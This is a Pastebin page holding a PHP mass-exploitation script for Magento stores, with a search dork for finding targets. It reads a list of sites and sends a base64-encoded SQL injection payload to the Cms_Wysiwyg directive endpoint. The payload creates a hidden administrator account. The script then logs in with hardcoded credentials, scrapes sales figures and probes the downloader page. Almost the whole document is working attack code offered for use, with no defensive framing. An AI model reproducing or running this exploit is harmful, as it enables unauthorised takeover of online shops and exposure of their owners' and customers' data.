API tools faq
paste
Advertisement
jok3d

exploit magento add admin

jok3d
Dec 23rd, 2016
973
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.24 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. // for more exploit or development visit my site
  3. // http://www.d4rknet.org/
  4. // Dork: "Powered By Magento"
  5. error_reporting(0);
  6. set_time_limit(0);
  7. $banner = '
  8.               ▒▒▒▒▒▒▒▓
  9.               ▒▒▒▒▒▒▒▓▓▓
  10.               ▒▓▓▓▓▓▓░░░▓
  11.               ▒▓░░░░▓░░░░▓
  12.               ▓░░░░░░▓░▓░▓
  13.               ▓░░░░░░▓░░░▓
  14.               ▓░░▓░░░▓▓▓▓
  15.               ▒▓░░░░▓▒▒▒▓
  16.               ▒▒▓▓▓▓▒▒▒▓
  17.    
  18.                
  19.         Exploit Magento Add Admin 2016
  20. ';
  21. function bersihkan($htmltags) {
  22.     $htmltags = str_replace('<span class="price">','',$htmltags);
  23.     $htmltags = str_replace('</span>','',$htmltags);
  24.     return $htmltags;
  25.    
  26. }
  27. $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
  28. $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=brazilobscure&login%5Bpassword%5D=brazilobscure123";
  29. $postdwn = "username=brazilobscure&password=brazilobscure123";
  30. $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
  31. $pagelog = "/admin/";
  32. $pagedwn = "/downloader/";
  33.  
  34. function stupid_CURL($url,$data,$page) {
  35. $ch = curl_init();
  36. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  37. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  38. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  39. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
  40. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  41. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  42. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  43. curl_setopt ($ch, CURLOPT_POST, 1);
  44. $headers  = array();
  45. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  46.  
  47. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  48. curl_setopt ($ch, CURLOPT_HEADER, 1);
  49. $result = curl_exec ($ch);
  50. curl_close($ch);
  51. return $result;
  52. }
  53. print $banner;
  54. $get=file_get_contents($argv[1])
  55. or die("
  56. \n\t Erro !
  57. \n\t MODO DE USAR ---> ./Exploit.php Sites.txt \n\n");
  58. $j=explode("\r\n",$get);
  59. foreach($j as $site){
  60.    
  61. print "\n\n\t---> TESTANDO SITE : ".$site;
  62. $hajar = stupid_CURL($site , $postadm, $pageadm);
  63.  
  64. if(preg_match('#200 OK#', $hajar)) {
  65.     $expres = "SUCESSO";
  66.     $ceklog = stupid_CURL($site , $postlog, $pagelog);
  67.    
  68. if(preg_match('#302 Moved#', $ceklog)) {
  69.     preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
  70.     foreach($match as $val)
  71.     {
  72.     $ltm = $val[0];
  73.     $avo = $val[1];
  74.     break;
  75.     }
  76.     $admlog = "SUCESSO";
  77.     $user = "brazilobscure";
  78.     $pass = "brazilobscure123";
  79.     $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
  80.     if(preg_match('#RETORNAR ADMIN#', $cekdwn)) {
  81.     $dwnlog = "LOGIN COM SUCESSO";
  82. }else {
  83.     $dwnlog = "LOGIN FALHOU";
  84. }
  85. }else {
  86.     $admlog = "FALHOU";
  87.     $user = "NULL";
  88.     $pass = "NULL";
  89. }
  90. }else {
  91.     $admlog = "FALHOU";
  92.     $expres = "FALHOU";
  93.     $user = "NULL";
  94.     $pass = "NULL";
  95.     $dwnlog = "LOGIN FALHOU";
  96.     $ltm = "NULL";
  97.     $avo = "NULL";
  98. }
  99. echo '
  100.     +---------------------------------------------+
  101.     | EXPLOIT   : '.$expres.'
  102.     | LOGIN ADMIN   : '.$admlog.'
  103.     | Lifetime Sales: '.bersihkan($ltm).'
  104.     | Average Order : '.bersihkan($avo).'
  105.     | Downloader    : '.$dwnlog.'
  106.     | Username  : '.$user.'
  107.     | Password  : '.$pass.'
  108.     +---------------------------------------------+
  109. ';
  110. }
  111. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!